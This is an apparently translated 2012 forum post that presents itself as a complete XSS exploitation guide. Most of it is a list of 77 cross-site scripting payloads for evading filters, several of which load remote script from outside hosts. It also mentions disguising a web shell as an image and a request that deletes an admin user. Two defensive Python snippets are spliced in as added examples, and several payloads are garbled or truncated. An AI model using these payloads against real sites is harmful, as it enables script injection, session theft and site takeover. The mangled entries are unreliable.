Complete XSS exploitation guide, part 1

Posted on 2012-9-13 17:04:56
Cross-site image shell
XSS cross-site code: <script>alert("")</script>

Put the code on the first line of the shell (trojan) and change the shell to JPG image format; when the image-format shell is accessed, our shell is executed as well.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>

(11) Embedded tab, splitting up the word javascript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the word javascript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line injected JavaScript, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Getting around length limits (all pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters basically have no effect in China, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in the IMG tag
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extra open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escape
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">
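The common thread in items 3 to 14, 19 and 47 is that the browser decoded character references, ignored case and dropped embedded tabs, newlines and NULs before it looked at the URL scheme, so a server-side filter has to normalize the same way before it compares anything. Added example, not part of the original post: a Python normalizer for an attribute value, run against constructed samples modelled on those items, with a plain substring filter beside it for comparison.

```python
import html
import re

# Control characters a legacy HTML parser dropped inside a URL (tab, LF, CR, NUL),
# which is why "jav<TAB>ascript:" (items 11-14) and "java\0script:" (item 17) still ran.
_CONTROL = re.compile(r"[\x00-\x20\x7f]")
_SCRIPT_SCHEMES = ("javascript:", "vbscript:")

def normalize_url_attribute(value: str) -> str:
    """Approximate the browser's view of an IMG SRC / HREF value before it is resolved:
    decode character references with or without ';' (items 5, 9, 10), drop surrounding
    quotes and leading whitespace or meta chars (item 19), remove control characters,
    and case-fold (item 4)."""
    value = html.unescape(value)          # html.unescape accepts "&#106;" and "&#x6A" alike
    value = value.strip("\"' ")
    value = _CONTROL.sub("", value)
    return value.lower()

def has_script_scheme(value: str) -> bool:
    """True when the normalized value resolves to a javascript: or vbscript: URL."""
    return normalize_url_attribute(value).startswith(_SCRIPT_SCHEMES)

def naive_has_script_scheme(value: str) -> bool:
    """A plain substring filter, kept for comparison: items 4-14 and 17 all slip past it."""
    return "javascript:" in value

# Constructed attribute values modelled on the page's items (not taken from any live site).
DANGEROUS = [
    "javascript:alert('XSS')",                                                     # item 3
    "JaVaScRiPt:alert('XSS')",                                                     # item 4
    "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",  # item 5
    "&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58alert('XSS')",             # item 9
    # item 10: the last reference keeps its ';' because the 'a' of alert is a hex digit
    "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",
    "jav\tascript:alert('XSS');",                                                  # item 11
    "jav&#x09;ascript:alert('XSS');",                                              # item 12
    "jav\nascript:alert('XSS');",                                                  # item 13
    "jav\rascript:alert('XSS');",                                                  # item 14
    "java\0script:alert(\"XSS\")",                                                 # item 17
    "\" &#14;javascript:alert('XSS');\"",                                          # item 19
    "'vbscript:msgbox(\"XSS\")'",                                                  # item 40
]
BENIGN = ["http://3w.org/XSS/xss.js", "/images/logo.jpg", "javascript_tips.html"]
```

Only two of the twelve constructed values contain the literal text "javascript:", so the substring filter passes the other ten while the normalized check flags all twelve and none of the benign ones.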
(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (anything made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash, your XSS code can be smuggled in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is being filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL evasion
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP address in decimal (dword)
<A HREF="http://3232235521">XSS</A>

(71) IP address in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP address in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
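Items 68 to 73 work because inet_aton-style host parsing accepts a single dword, hex and octal components and fewer than four parts, so a link filter that compares host strings against "127.0.0.1" or a private range misses the same address written another way. Added example (not from the original post): a Python canonicalizer for those IPv4 literal forms, plus an internal-address check on the canonical result; the tab inside the item-73 host is dropped first, as a lenient parser would.

```python
import ipaddress
import re

# Whitespace and control characters a lenient URL parser ignores inside a host,
# which is what lets the tabs in item 73 ("6<TAB>6.000146.0x7.147") through.
_CONTROL = re.compile(r"[\x00-\x20\x7f]")
_PART = re.compile(r"[0-9A-Za-z]+")

def _parse_part(text: str) -> int:
    """One dot-separated component, with inet_aton(3) rules: a 0x prefix means hex,
    a leading 0 means octal, anything else is decimal."""
    if text[:2].lower() == "0x":
        return int(text[2:], 16)
    if len(text) > 1 and text[0] == "0":
        return int(text, 8)
    return int(text, 10)

def canonical_ipv4(host: str):
    """Dotted-decimal form of an IPv4 literal written in any form inet_aton accepts
    (items 70-73: a bare dword, hex or octal components, fewer than four parts),
    or None when the host is not such a literal."""
    parts = _CONTROL.sub("", host).split(".")
    if not 1 <= len(parts) <= 4 or not all(_PART.fullmatch(p) for p in parts):
        return None
    try:
        values = [_parse_part(p) for p in parts]
    except ValueError:                      # e.g. "08" (bad octal) or a DNS label
        return None
    # The last component fills every byte the earlier ones did not cover:
    # a.b.c.d gives it 8 bits, a.b.c 16, a.b 24 and a bare dword all 32.
    last_bits = 8 * (5 - len(parts))
    if any(v > 255 for v in values[:-1]) or values[-1] >= 1 << last_bits:
        return None
    number = 0
    for v in values[:-1]:
        number = (number << 8) | v
    number = (number << last_bits) | values[-1]
    return ".".join(str((number >> shift) & 0xFF) for shift in (24, 16, 8, 0))

def targets_internal_host(host: str) -> bool:
    """True when the literal, however encoded, denotes a loopback or private address;
    a string comparison against "127.0.0.1" (item 68) would miss 2130706433."""
    canon = canonical_ipv4(host)
    if canon is None:
        return False
    addr = ipaddress.ip_address(canon)
    return addr.is_loopback or addr.is_private
```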

(74) Omitting the protocol (http:)
<A HREF="//www.google.com/">XSS</A>

(75) Omitting www
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) JavaScript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>